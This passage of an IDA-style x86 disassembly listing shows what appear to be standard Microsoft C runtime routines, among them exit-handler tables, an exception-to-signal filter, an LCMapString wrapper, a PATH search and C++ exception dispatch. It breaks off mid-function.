cmp esi, dword_676EB4
jnb short loc_430AD7
loc_430AEA: ; CODE XREF: sub_430A86+4F�j
pop esi
loc_430AEB: ; CODE XREF: sub_430A86+41�j
push offset dword_43A034
push offset dword_43A02C
call sub_430B3D
pop ecx
pop ecx
loc_430AFC: ; CODE XREF: sub_430A86+38�j
push offset dword_43A040
push offset dword_43A038
call sub_430B3D
pop ecx
pop ecx
test ebx, ebx
pop ebx
jz short loc_430B19
call sub_430B34
pop edi
retn
; ---------------------------------------------------------------------------
loc_430B19: ; CODE XREF: sub_430A86+8A�j
push [esp+4+arg_0]
mov dword_6769EC, edi
call dword_4370C4 ; ExitProcess
pop edi
retn
sub_430A86 endp
; =============== S U B R O U T I N E =======================================
sub_430B2B proc near ; CODE XREF: sub_42B71B+1�p
; sub_430A86+1�p
push 0Dh
call sub_42DA1F
pop ecx
retn
sub_430B2B endp
; =============== S U B R O U T I N E =======================================
sub_430B34 proc near ; CODE XREF: sub_42B71B:loc_42B790�p
; sub_430A86+8C�p
push 0Dh
call sub_42DA80
pop ecx
retn
sub_430B34 endp
; =============== S U B R O U T I N E =======================================
sub_430B3D proc near ; CODE XREF: sub_430A37+15�p
; sub_430A37+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_430B42: ; CODE XREF: sub_430B3D+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_430B55
mov eax, [esi]
test eax, eax
jz short loc_430B50
call eax
loc_430B50: ; CODE XREF: sub_430B3D+F�j
add esi, 4
jmp short loc_430B42
; ---------------------------------------------------------------------------
loc_430B55: ; CODE XREF: sub_430B3D+9�j
pop esi
retn
sub_430B3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430B57 proc near ; CODE XREF: .text:0042ABA8�p
; .text:0042C599�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
call sub_42E41E
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_430C95
pop ecx
test eax, eax
pop ecx
jz loc_430C88
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_430C88
cmp ebx, 5
jnz short loc_430B98
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_430C91
; ---------------------------------------------------------------------------
loc_430B98: ; CODE XREF: sub_430B57+33�j
cmp ebx, 1
jz loc_430C83
mov ecx, [esi+54h]
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_4]
mov [esi+54h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_430C75
mov edx, dword_453890
mov ecx, dword_453894
add ecx, edx
push edi
cmp edx, ecx
jge short loc_430BF3
lea ecx, [edx+edx*2]
shl ecx, 2
loc_430BD2: ; CODE XREF: sub_430B57+97�j
mov edi, [esi+50h]
add ecx, 0Ch
and dword ptr [ecx+edi-4], 0
mov edi, dword_453890
mov ebx, dword_453894
inc edx
add ebx, edi
cmp edx, ebx
jl short loc_430BD2
mov ebx, [ebp+arg_0]
loc_430BF3: ; CODE XREF: sub_430B57+73�j
mov eax, [eax]
mov edi, [esi+58h]
cmp eax, 0C000008Eh
jnz short loc_430C08
mov dword ptr [esi+58h], 83h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C08: ; CODE XREF: sub_430B57+A6�j
cmp eax, 0C0000090h
jnz short loc_430C18
mov dword ptr [esi+58h], 81h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C18: ; CODE XREF: sub_430B57+B6�j
cmp eax, 0C0000091h
jnz short loc_430C28
mov dword ptr [esi+58h], 84h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C28: ; CODE XREF: sub_430B57+C6�j
cmp eax, 0C0000093h
jnz short loc_430C38
mov dword ptr [esi+58h], 85h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C38: ; CODE XREF: sub_430B57+D6�j
cmp eax, 0C000008Dh
jnz short loc_430C48
mov dword ptr [esi+58h], 82h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C48: ; CODE XREF: sub_430B57+E6�j
cmp eax, 0C000008Fh
jnz short loc_430C58
mov dword ptr [esi+58h], 86h
jmp short loc_430C66
; ---------------------------------------------------------------------------
loc_430C58: ; CODE XREF: sub_430B57+F6�j
cmp eax, 0C0000092h
jnz short loc_430C66
mov dword ptr [esi+58h], 8Ah
loc_430C66: ; CODE XREF: sub_430B57+AF�j
; sub_430B57+BF�j ...
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
mov [esi+58h], edi
pop ecx
pop edi
jmp short loc_430C7D
; ---------------------------------------------------------------------------
loc_430C75: ; CODE XREF: sub_430B57+5C�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_430C7D: ; CODE XREF: sub_430B57+11C�j
mov eax, [ebp+var_4]
mov [esi+54h], eax
loc_430C83: ; CODE XREF: sub_430B57+44�j
or eax, 0FFFFFFFFh
jmp short loc_430C91
; ---------------------------------------------------------------------------
loc_430C88: ; CODE XREF: sub_430B57+1C�j
; sub_430B57+2A�j
push [ebp+arg_4]
call dword_4371EC ; UnhandledExceptionFilter
loc_430C91: ; CODE XREF: sub_430B57+3C�j
; sub_430B57+12F�j
pop esi
pop ebx
leave
retn
sub_430B57 endp
; =============== S U B R O U T I N E =======================================
sub_430C95 proc near ; CODE XREF: sub_430B57+13�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_45389C
push esi
mov esi, [esp+4+arg_0]
cmp [edx], esi
push edi
mov eax, edx
jz short loc_430CBC
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_430CB1: ; CODE XREF: sub_430C95+25�j
add eax, 0Ch
cmp eax, edi
jnb short loc_430CBC
cmp [eax], esi
jnz short loc_430CB1
loc_430CBC: ; CODE XREF: sub_430C95+14�j
; sub_430C95+21�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_430CCA
cmp [eax], esi
jz short loc_430CCC
loc_430CCA: ; CODE XREF: sub_430C95+2F�j
xor eax, eax
loc_430CCC: ; CODE XREF: sub_430C95+33�j
pop edi
pop esi
retn
sub_430C95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430CCF proc near ; CODE XREF: sub_42AE50+C5�p
; sub_42AE50+F3�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437678
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_6769F0, edi
jnz short loc_430D45
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_437670
mov esi, 100h
push esi
push edi
call dword_4371E4 ; LCMapStringW
test eax, eax
jz short loc_430D23
mov dword_6769F0, ebx
jmp short loc_430D45
; ---------------------------------------------------------------------------
loc_430D23: ; CODE XREF: sub_430CCF+4A�j
push edi
push edi
push ebx
push offset word_454018
push esi
push edi
call dword_4371E8 ; LCMapStringA
test eax, eax
jz loc_430E5D
mov dword_6769F0, 2
loc_430D45: ; CODE XREF: sub_430CCF+2E�j
; sub_430CCF+52�j
cmp [ebp+arg_C], edi
jle short loc_430D5A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_435C92
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_430D5A: ; CODE XREF: sub_430CCF+79�j
mov eax, dword_6769F0
cmp eax, 2
jnz short loc_430D81
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E8 ; LCMapStringA
jmp loc_430E5F
; ---------------------------------------------------------------------------
loc_430D81: ; CODE XREF: sub_430CCF+93�j
cmp eax, 1
jnz loc_430E5D
cmp [ebp+arg_18], edi
jnz short loc_430D97
mov eax, dword_676998
mov [ebp+arg_18], eax
loc_430D97: ; CODE XREF: sub_430CCF+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_437180 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_430E5D
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_429A90
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_430DF2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_430DF2: ; CODE XREF: sub_430CCF+10E�j
cmp [ebp+var_24], edi
jz short loc_430E5D
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_437180 ; MultiByteToWideChar
test eax, eax
jz short loc_430E5D
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E4 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_430E5D
test byte ptr [ebp+arg_4+1], 4
jz short loc_430E71
cmp [ebp+arg_14], edi
jz loc_430EEC
cmp esi, [ebp+arg_14]
jg short loc_430E5D
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E4 ; LCMapStringW
test eax, eax
jnz loc_430EEC
loc_430E5D: ; CODE XREF: sub_430CCF+66�j
; sub_430CCF+B5�j ...
xor eax, eax
loc_430E5F: ; CODE XREF: sub_430CCF+AD�j
; sub_430CCF+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_430E71: ; CODE XREF: sub_430CCF+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_429A90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_430EA5
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_430EA5: ; CODE XREF: sub_430CCF+1C2�j
cmp ebx, edi
jz short loc_430E5D
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E4 ; LCMapStringW
test eax, eax
jz short loc_430E5D
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_430ECC
push edi
push edi
jmp short loc_430ED2
; ---------------------------------------------------------------------------
loc_430ECC: ; CODE XREF: sub_430CCF+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_430ED2: ; CODE XREF: sub_430CCF+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_437074 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_430E5D
loc_430EEC: ; CODE XREF: sub_430CCF+165�j
; sub_430CCF+188�j
mov eax, esi
jmp loc_430E5F
sub_430CCF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430EF3 proc near ; CODE XREF: sub_42B019+96�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_431058
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_431051
call sub_42F049
cmp dword ptr [eax], 2
jnz loc_431051
push 2Fh
push [ebp+arg_4]
call sub_4346C4
pop ecx
test eax, eax
pop ecx
jnz loc_431051
push offset aPath ; "PATH"
call sub_4311F2
mov edi, eax
pop ecx
test edi, edi
jz loc_431051
push 104h
call sub_4296E8
mov esi, eax
pop ecx
test esi, esi
jz loc_431051
push ebx
mov ebx, 103h
push ebx
push esi
push edi
loc_430F6F: ; CODE XREF: sub_430EF3+151�j
call sub_434650
add esp, 0Ch
mov [ebp+var_4], eax
test eax, eax
jz loc_431049
cmp byte ptr [esi], 0
jz loc_431049
push esi
call sub_4292D0
lea edi, [eax+esi-1]
pop ecx
mov al, [edi]
cmp al, 5Ch
jnz short loc_430FAA
push 5Ch
push esi
call sub_4345DE
pop ecx
cmp edi, eax
pop ecx
jmp short loc_430FAC
; ---------------------------------------------------------------------------
loc_430FAA: ; CODE XREF: sub_430EF3+A7�j
cmp al, 2Fh
loc_430FAC: ; CODE XREF: sub_430EF3+B5�j
jz short loc_430FBB
push offset asc_44DA9C ; "\\"
push esi
call sub_42A510
pop ecx
pop ecx
loc_430FBB: ; CODE XREF: sub_430EF3:loc_430FAC�j
push esi
call sub_4292D0
push [ebp+arg_4]
mov edi, eax
call sub_4292D0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_431049
push [ebp+arg_4]
push esi
call sub_42A510
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push [ebp+arg_0]
call sub_431058
add esp, 18h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_431049
call sub_42F049
cmp dword ptr [eax], 2
jz short loc_43103F
push 5Ch
push esi
call sub_4346C4
pop ecx
cmp esi, eax
pop ecx
jz short loc_431020
push 2Fh
push esi
call sub_4346C4
pop ecx
cmp esi, eax
pop ecx
jnz short loc_431049
loc_431020: ; CODE XREF: sub_430EF3+11D�j
lea edi, [esi+1]
push 5Ch
push edi
call sub_4346C4
pop ecx
cmp edi, eax
pop ecx
jz short loc_43103F
push 2Fh
push edi
call sub_4346C4
pop ecx
cmp edi, eax
pop ecx
jnz short loc_431049
loc_43103F: ; CODE XREF: sub_430EF3+10F�j
; sub_430EF3+13C�j
push ebx
push esi
push [ebp+var_4]
jmp loc_430F6F
; ---------------------------------------------------------------------------
loc_431049: ; CODE XREF: sub_430EF3+89�j
; sub_430EF3+92�j ...
push esi
call sub_429822
pop ecx
pop ebx
loc_431051: ; CODE XREF: sub_430EF3+21�j
; sub_430EF3+2F�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_430EF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431058 proc near ; CODE XREF: sub_42B019+4F�p
; sub_430EF3+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
push 5Ch
push ebx
mov edi, ebx
call sub_4345DE
push 2Fh
push ebx
mov esi, eax
call sub_4345DE
add esp, 10h
test eax, eax
jnz short loc_4310C3
test esi, esi
jnz short loc_4310CD
push 3Ah
push ebx
call sub_4346C4
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_4310CD
push ebx
call sub_4292D0
add eax, 3
push eax
call sub_4296E8
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_431126
push offset a__0 ; ".\\"
push edi
call sub_42A500
push ebx
push edi
call sub_42A510
add esp, 10h
lea esi, [edi+2]
jmp short loc_4310CD
; ---------------------------------------------------------------------------
loc_4310C3: ; CODE XREF: sub_431058+24�j
test esi, esi
jz short loc_4310CB
cmp eax, esi
jbe short loc_4310CD
loc_4310CB: ; CODE XREF: sub_431058+6D�j
mov esi, eax
loc_4310CD: ; CODE XREF: sub_431058+28�j
; sub_431058+38�j ...
or [ebp+var_8], 0FFFFFFFFh
push 2Eh
push esi
call sub_4345DE
pop ecx
test eax, eax
pop ecx
jz short loc_43110C
push 0
push edi
call sub_42A5F0
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_43118E
push [ebp+arg_C]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_4311A1
add esp, 10h
mov [ebp+var_8], eax
jmp loc_43118E
; ---------------------------------------------------------------------------
loc_43110C: ; CODE XREF: sub_431058+85�j
push edi
call sub_4292D0
add eax, 5
push eax
call sub_4296E8
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
mov [ebp+var_4], ebx
jnz short loc_43112B
loc_431126: ; CODE XREF: sub_431058+4F�j
or eax, 0FFFFFFFFh
jmp short loc_43119C
; ---------------------------------------------------------------------------
loc_43112B: ; CODE XREF: sub_431058+CC�j
push edi
push ebx
call sub_42A500
push edi
call sub_4292D0
mov esi, eax
add esp, 0Ch
add esi, ebx
mov ebx, offset off_4538AC
loc_431144: ; CODE XREF: sub_431058+10F�j
push dword ptr [ebx]
push esi
call sub_42A500
push 0
push [ebp+var_4]
call sub_42A5F0
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_43116B
sub ebx, 4
cmp ebx, offset off_4538A0
jge short loc_431144
jmp short loc_431182
; ---------------------------------------------------------------------------
loc_43116B: ; CODE XREF: sub_431058+104�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_4]
push [ebp+arg_0]
call sub_4311A1
add esp, 10h
mov [ebp+var_8], eax
loc_431182: ; CODE XREF: sub_431058+111�j
push [ebp+var_4]
call sub_429822
mov ebx, [ebp+arg_4]
pop ecx
loc_43118E: ; CODE XREF: sub_431058+94�j
; sub_431058+AF�j
cmp edi, ebx
jz short loc_431199
push edi
call sub_429822
pop ecx
loc_431199: ; CODE XREF: sub_431058+138�j
mov eax, [ebp+var_8]
loc_43119C: ; CODE XREF: sub_431058+D1�j
pop edi
pop esi
pop ebx
leave
retn
sub_431058 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4311A1 proc near ; CODE XREF: sub_431058+A4�p
; sub_431058+11F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_4]
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_434944
add esp, 14h
cmp eax, 0FFFFFFFFh
jnz short loc_4311C6
or eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4311C6: ; CODE XREF: sub_4311A1+1F�j
push esi
push [ebp+arg_8]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43475B
push [ebp+arg_C]
mov esi, eax
call sub_429822
push [ebp+arg_8]
call sub_429822
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_4311A1 endp
; =============== S U B R O U T I N E =======================================
sub_4311F2 proc near ; CODE XREF: sub_42B019+D�p
; sub_430EF3+4E�p
arg_0 = dword ptr 4
push esi
push 0Ch
call sub_42DA1F
push [esp+8+arg_0]
call sub_431213
push 0Ch
mov esi, eax
call sub_42DA80
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_4311F2 endp
; =============== S U B R O U T I N E =======================================
sub_431213 proc near ; CODE XREF: sub_4311F2+C�p
; sub_4338E9+31�p
arg_0 = dword ptr 4
cmp dword_676EA8, 0
push ebx
push esi
mov esi, dword_6769CC
push edi
jz short loc_43128A
test esi, esi
jnz short loc_431244
cmp dword_6769D4, esi
jz short loc_43128A
call sub_434B89
test eax, eax
jnz short loc_43128A
mov esi, dword_6769CC
test esi, esi
jz short loc_43128A
loc_431244: ; CODE XREF: sub_431213+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_43128A
push ebx
call sub_4292D0
pop ecx
mov edi, eax
loc_431255: ; CODE XREF: sub_431213+6D�j
mov eax, [esi]
test eax, eax
jz short loc_43128A
push eax
call sub_4292D0
cmp eax, edi
pop ecx
jbe short loc_43127D
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_43127D
push edi
push ebx
push eax
call sub_434B4A
add esp, 0Ch
test eax, eax
jz short loc_431282
loc_43127D: ; CODE XREF: sub_431213+51�j
; sub_431213+59�j
add esi, 4
jmp short loc_431255
; ---------------------------------------------------------------------------
loc_431282: ; CODE XREF: sub_431213+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_43128C
; ---------------------------------------------------------------------------
loc_43128A: ; CODE XREF: sub_431213+10�j
; sub_431213+1C�j ...
xor eax, eax
loc_43128C: ; CODE XREF: sub_431213+75�j
pop edi
pop esi
pop ebx
retn
sub_431213 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431290 proc near ; CODE XREF: .text:0042B4C7�p
; sub_42B530+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_4312A6
call sub_431B5D
loc_4312A6: ; CODE XREF: sub_431290+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_4312CE
cmp dword ptr [esi+4], 0
jz short loc_431324
cmp [ebp+arg_14], 0
jnz short loc_431324
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_4315E5
add esp, 10h
jmp short loc_431324
; ---------------------------------------------------------------------------
loc_4312CE: ; CODE XREF: sub_431290+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_431324
cmp dword ptr [eax], 0E06D7363h
jnz short loc_431308
cmp [eax+14h], edi
jbe short loc_431308
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_431308
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_431327
; ---------------------------------------------------------------------------
loc_431308: ; CODE XREF: sub_431290+4A�j
; sub_431290+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_43132B
add esp, 20h
loc_431324: ; CODE XREF: sub_431290+23�j
; sub_431290+29�j ...
push 1
pop eax
loc_431327: ; CODE XREF: sub_431290+76�j
pop edi
pop esi
pop ebp
retn
sub_431290 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43132B proc near ; CODE XREF: sub_431290+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_43134B
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_431350
loc_43134B: ; CODE XREF: sub_43132B+16�j
call sub_431B5D
loc_431350: ; CODE XREF: sub_43132B+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_4314B3
cmp dword ptr [esi+10h], 3
jnz short loc_4313D0
cmp [esi+14h], edi
jnz short loc_4313D0
cmp dword ptr [esi+1Ch], 0
jnz short loc_4313D0
call sub_42E41E
cmp dword ptr [eax+6Ch], 0
jz loc_4314AE
call sub_42E41E
mov esi, [eax+6Ch]
call sub_42E41E
mov eax, [eax+70h]
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_434BF7
pop ecx
test eax, eax
pop ecx
jnz short loc_4313B2
call sub_431B5D
loc_4313B2: ; CODE XREF: sub_43132B+80�j
cmp [esi], ebx
jnz loc_4314B3
cmp dword ptr [esi+10h], 3
jnz short loc_4313D0
cmp [esi+14h], edi
jnz short loc_4313D0
cmp dword ptr [esi+1Ch], 0
jnz short loc_4313D0
call sub_431B5D
loc_4313D0: ; CODE XREF: sub_43132B+41�j
; sub_43132B+46�j ...
cmp [esi], ebx
jnz loc_4314B3
cmp dword ptr [esi+10h], 3
jnz loc_4314B3
cmp [esi+14h], edi
jnz loc_4314B3
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_42B680
add esp, 14h
mov ebx, eax
loc_431407: ; CODE XREF: sub_43132B+16E�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_43149E
cmp [ebx], edi
jg short loc_431493
cmp edi, [ebx+4]
jg short loc_431493
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_431490
loc_43142C: ; CODE XREF: sub_43132B+13D�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_43145D
loc_43143E: ; CODE XREF: sub_43132B+130�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_431588
add esp, 0Ch
test eax, eax
jnz short loc_43146C
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_43143E
loc_43145D: ; CODE XREF: sub_43132B+111�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_43142C
jmp short loc_431490
; ---------------------------------------------------------------------------
loc_43146C: ; CODE XREF: sub_43132B+125�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_431699
add esp, 2Ch
loc_431490: ; CODE XREF: sub_43132B+FF�j
; sub_43132B+13F�j
mov edi, [ebp+var_10]
loc_431493: ; CODE XREF: sub_43132B+EA�j
; sub_43132B+EF�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_431407
; ---------------------------------------------------------------------------
loc_43149E: ; CODE XREF: sub_43132B+E2�j
cmp [ebp+arg_14], 0
jz short loc_4314AE
push 1
push esi
call sub_431A1D
pop ecx
pop ecx
loc_4314AE: ; CODE XREF: sub_43132B+57�j
; sub_43132B+177�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4314B3: ; CODE XREF: sub_43132B+37�j
; sub_43132B+89�j ...
cmp [ebp+arg_14], 0
jnz short loc_4314D9
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4314DE
add esp, 20h
jmp short loc_4314AE
; ---------------------------------------------------------------------------
loc_4314D9: ; CODE XREF: sub_43132B+18C�j
jmp sub_431AFC
sub_43132B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4314DE proc near ; CODE XREF: sub_43132B+1A4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
call sub_42E41E
cmp dword ptr [eax+68h], 0
jz short loc_431511
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42B555
add esp, 1Ch
test eax, eax
jnz short loc_431584
loc_431511: ; CODE XREF: sub_4314DE+10�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_42B680
add esp, 14h
mov esi, eax
loc_43152D: ; CODE XREF: sub_4314DE+A4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_431584
cmp edi, [esi]
jl short loc_43157C
cmp edi, [esi+4]
jg short loc_43157C
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_431556
cmp byte ptr [ecx+8], 0
jnz short loc_43157C
loc_431556: ; CODE XREF: sub_4314DE+70�j
